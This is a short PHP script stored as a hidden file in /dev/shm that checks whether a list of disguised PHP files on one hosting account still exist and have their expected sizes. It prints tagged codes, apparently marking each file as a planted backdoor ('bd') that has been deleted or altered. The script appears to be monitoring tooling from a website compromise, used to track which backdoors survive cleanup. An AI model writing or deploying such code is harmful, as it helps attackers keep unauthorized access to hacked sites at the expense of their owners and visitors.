File: //dev/shm/.factor
<?php $r = '/home/pegajyub/phoenixdigilabs.com'; $x = ["/theme_sidebar.php"=>"bd@@275782170@@933",
"/thai.php"=>"bd@@275778597@@1039",
"/adv.inc.php"=>"bd@@275771991@@1000",
"/adv.php"=>"bd@@275774312@@1003",
"/usergroup_1.php"=>"bd@@275762836@@964",
"/dispimg.php"=>"bd@@275780584@@875",
"/webapp.php"=>"bd@@275769840@@891",
"/webdb.php"=>"bd@@275784369@@19",
"/XHTMLAndHTML4.php"=>"bd@@275784374@@45",
"/usergroup.php"=>"bd@@275784379@@78",
"/buttons.php"=>"bd@@275784385@@34",
"/xoopsobject.php"=>"bd@@275784387@@5",
"/affiliate.php"=>"bd@@275784393@@81",
"/password_funcs.php"=>"bd@@275784398@@84",
"/beginedit4.php"=>"bd@@275784401@@70",
"/theme_sidebar.php"=>"bd@@275784406@@92",
"/replacement.php"=>"bd@@275784412@@63",
"/thai.lng.php"=>"bd@@275776514@@931",
"/theme.php"=>"bd@@275784413@@1092"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');